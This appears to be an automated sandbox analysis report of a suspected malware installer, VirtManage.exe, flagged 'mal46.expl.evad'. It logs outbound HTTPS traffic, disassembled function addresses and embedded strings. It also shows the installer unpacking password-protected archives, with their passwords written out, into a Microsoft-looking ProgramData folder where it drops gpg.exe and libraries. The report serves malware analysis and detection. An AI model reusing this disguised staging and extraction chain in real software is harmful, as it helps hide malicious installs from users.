Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.153.11:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49793 version: TLS 1.2
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00406DE6
Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_004075BD
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004BF8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0047A150
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00412440
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004E0400
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00424570
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004605C2
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004745E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0048E5E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00498600
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00450690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0046A690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004387E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004CC8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0040CAD0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004D2AE0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00434B60
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0047CB28
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004A2BF0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00466B86
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0045CB80
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00406C10
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0042D070
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00419169
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0046D100
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0044D180
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004E1190
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004A5300
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0040D511
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004BB6F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00477940
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_00433AC0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0042DD10
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004BF8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0047A150
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00412440
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004E0400
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00424570
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004605C2
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004745E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0048E5E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00498600
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00450690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0046A690
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004387E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004CC8C0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0040CAD0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004D2AE0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00434B60
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0047CB28
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004A2BF0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00466B86
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0045CB80
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00406C10
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0042D070
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00419169
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0046D100
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0044D180
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004E1190
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004A5300
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0040D511
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004BB6F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_00477940
Source: C:\Users\user\Desktop\VirtManage.exe | Process token adjusted: Security
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: String function: 004DF490 appears 136 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: String function: 00426BB0 appears 61 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: String function: 004DF438 appears 58 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: String function: 004DEFB0 appears 170 times
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: String function: 004C0240 appears 53 times
Source: zlib1.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libgcrypt-20.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libnpth-0.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: aclui-2.dll.16.dr | Static PE information: Number of sections : 20 > 10
Source: libgpg-error-0.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libassuan-9.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: aclui.dll.16.dr | Static PE information: Number of sections : 20 > 10
Source: aclui.dll.0.dr | Static PE information: Number of sections : 20 > 10
Source: VirtManage.exe, 00000000.00000003.888147264.0000000002D80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegpg-agent.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegpg.exeT vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibassuan.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibgcrypt.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibgpg-error.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibnpth.dll" vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000002.3342705388.000000000040A000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamensis7z.dll, vs VirtManage.exe
Source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOLEVIEW.EXEj% vs VirtManage.exe
Source: VirtManage.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI
Source: classification engineClassification label: mal46.expl.evad.winEXE@56/81@2/3
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004AE4A0 FormatMessageA,strlen,GetLastError,1_2_004AE4A0
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004049E7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049E7
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeFile created: C:\Users\user\AppData\Roaming\gnupgJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrFBD1.tmpJump to behavior
Source: VirtManage.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\VirtManage.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table if not exists encryptions (binding INTEGER NOT NULL, time INTEGER);create index if not exists encryptions_binding on encryptions (binding);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: create table version (version INTEGER);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: insert into version values (1);
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select count(*) from sqlite_master where type='table';
Source: gpg.exe, gpg.exe, 00000003.00000002.921015417.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 00000005.00000002.932022027.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000A.00000002.993208467.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, gpg.exe, 0000000C.00000002.998574183.0000000066676000.00000002.00000001.01000000.0000000B.sdmp, libsqlite3-0.dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: VirtManage.exe, 00000000.00000003.888415316.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000000.909650974.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000000.917784657.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000002.930719728.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000000.989539324.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000C.00000000.994738483.00000000004FA000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: select ((select count(*) from ultimately_trusted_keys where (keyid in (%s))) == %d) and ((select count(*) from ultimately_trusted_keys where keyid not in (%s)) == 0);
